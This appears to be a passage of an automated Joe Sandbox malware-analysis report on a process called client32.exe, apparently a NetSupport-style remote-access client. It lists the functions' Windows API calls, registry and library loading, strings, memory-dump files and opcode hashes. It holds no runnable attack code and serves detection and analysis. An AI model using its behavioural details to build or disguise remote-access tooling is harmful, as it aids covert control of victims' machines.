                                                                                                                                                                • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                                                                                • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                                                                                                Function 11049640 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110ECA90: IsWindow.USER32(0000070B), ref: 110ECA9D
                                                                                                                                                                  • Part of subcall function 110ECA90: SendMessageA.USER32(0000070B,0000045F,0000070B,00000000), ref: 110ECAD4
                                                                                                                                                                  • Part of subcall function 110ECA90: SendMessageA.USER32(0000070B,0000044B,00000000,?), ref: 110ECB06
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110496FE
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 11049705
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CursorFolderMessagePathSend$FileLoadModuleNameWindow
                                                                                                                                                                • String ID: "%s%s" %s$nsmexec.exe
                                                                                                                                                                • API String ID: 3894576003-3170401571
                                                                                                                                                                • Opcode ID: 779bfdace7f5841e7d23481dfbcacb01516c4f92a642df6ba432abaa3de3d541
                                                                                                                                                                • Instruction ID: f42932a1cd0d7f5c398cde3da9c5cba293413b1f3726e8dd808e29983910ad54
                                                                                                                                                                • Opcode Fuzzy Hash: 779bfdace7f5841e7d23481dfbcacb01516c4f92a642df6ba432abaa3de3d541
                                                                                                                                                                • Instruction Fuzzy Hash: 38210471D04215EFE701CF55CC81F9AF7A8FB44728F108175E82497640E77AA614CBA2
                                                                                                                                                                Function 11031720 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(59FD48C0,00000000,00000006,59FD48C0,1117DECB,000000FF,?,11066BE8,NSMWClass,59FD48C0,?,1106EA58), ref: 1103175A
                                                                                                                                                                • __strdup.LIBCMT ref: 110317A5
                                                                                                                                                                  • Part of subcall function 11031660: LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031692
                                                                                                                                                                  • Part of subcall function 11031660: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316D0
                                                                                                                                                                  • Part of subcall function 11031660: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 110316DE
                                                                                                                                                                  • Part of subcall function 11031660: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 11031704
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                                                                • String ID: NSMWClass$NSMWClassVista
                                                                                                                                                                • API String ID: 319803333-889775840
                                                                                                                                                                • Opcode ID: 4c9b37b807482a264d938b028bcae5bdead3c3a392ed8a72fe7c5f11a81d2b87
                                                                                                                                                                • Instruction ID: 94daa849741b83d34ebdec6600d8a815dd2e8c1c2b198c9f7830c00fb7d7c227
                                                                                                                                                                • Opcode Fuzzy Hash: 4c9b37b807482a264d938b028bcae5bdead3c3a392ed8a72fe7c5f11a81d2b87
                                                                                                                                                                • Instruction Fuzzy Hash: 5A210576E242895FD712CF3989407AAFBFABF99625F084669E855C7780FB369408C340
                                                                                                                                                                Function 110893D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
                                                                                                                                                                  • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
                                                                                                                                                                  • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
                                                                                                                                                                  • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
                                                                                                                                                                  • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
                                                                                                                                                                • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                • String ID: hhctrl.ocx
                                                                                                                                                                • API String ID: 1060647816-2298675154
                                                                                                                                                                • Opcode ID: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                                                                                                • Instruction ID: 21cf1aba31526e8ead5fc6aa4b71c903af58d6e9e090c4be98d1d971a6eb0305
                                                                                                                                                                • Opcode Fuzzy Hash: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                                                                                                • Instruction Fuzzy Hash: E911663260826B9BDB84DF65C994BDAF7A8EB4B758B41003FE521D3544EB70D844CB92
                                                                                                                                                                Function 1108D450 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
                                                                                                                                                                • API String ID: 269201875-4101313740
                                                                                                                                                                • Opcode ID: 05528c00b0d83c48d48905ab30b2b4a0e282f0399ca056ce22f5845f374b42cd
                                                                                                                                                                • Instruction ID: f60c2375dc276d5edcc26cf4931ab8b6ca6a05f77776cf6b2942ef3b5d239818
                                                                                                                                                                • Opcode Fuzzy Hash: 05528c00b0d83c48d48905ab30b2b4a0e282f0399ca056ce22f5845f374b42cd
                                                                                                                                                                • Instruction Fuzzy Hash: 292163797447019FE714DBA8CC90FA6B3A1BF88B18F240A6CE6698B7C1DA71F840C751
                                                                                                                                                                Function 110B91D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                                                                                                • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                                                                                                • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                                                                                • String ID: Max
                                                                                                                                                                • API String ID: 1521622399-2772132969
                                                                                                                                                                • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                                                                                • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                                                                                                • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                                                                                • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                                                                                                Function 110ED6D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __itow.LIBCMT ref: 110ED6F2
                                                                                                                                                                  • Part of subcall function 11164459: _xtoa@16.LIBCMT ref: 11164479
                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11194244,?,?,?,?,?,?,110FF66A), ref: 110ED717
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value__itow_xtoa@16
                                                                                                                                                                • String ID: Error %d setting %s to %s$nsdevcon64.exe
                                                                                                                                                                • API String ID: 293635345-4188669160
                                                                                                                                                                • Opcode ID: fbf5e33a9e8abcc9bdfe13103256e276cfb5ec8c5f3b3f6bc8aaed6c48983a06
                                                                                                                                                                • Instruction ID: 80875a4f71977fcf23e77d00b478b719a3ceeb1732ea917463692c61b0fe7ef6
                                                                                                                                                                • Opcode Fuzzy Hash: fbf5e33a9e8abcc9bdfe13103256e276cfb5ec8c5f3b3f6bc8aaed6c48983a06
                                                                                                                                                                • Instruction Fuzzy Hash: 2C016D75A01219ABD714DA699C89EEFB7ACEB49708F104199F944A7240EA72AE0487A0
                                                                                                                                                                Function 1115F4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1115F4EF
                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1115F511
                                                                                                                                                                • TrackPopupMenuEx.USER32(?,?,?,?,00000000,?), ref: 1115F53D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$InfoItemPopupTrack_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 841834121-4108050209
                                                                                                                                                                • Opcode ID: 831e81e5ad380a982040b351cb416d00d0ecec362e96fad05f44ad6f581621aa
                                                                                                                                                                • Instruction ID: 11b0bbd5124b4240e378f9f2873e2e4f909fb166035a0611f634cf73ad8dba36
                                                                                                                                                                • Opcode Fuzzy Hash: 831e81e5ad380a982040b351cb416d00d0ecec362e96fad05f44ad6f581621aa
                                                                                                                                                                • Instruction Fuzzy Hash: 23014BB1920219ABEB04DF94DC49FEFB7ACEB48315F004109F914A7180D3B0A910CBE5
                                                                                                                                                                Function 110ED0F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 110ED118
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                                                                • API String ID: 2577986331-1331251348
                                                                                                                                                                • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                                                                                • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                                                                                                • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                                                                                • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                                                                                                Function 110813C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 11081417
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
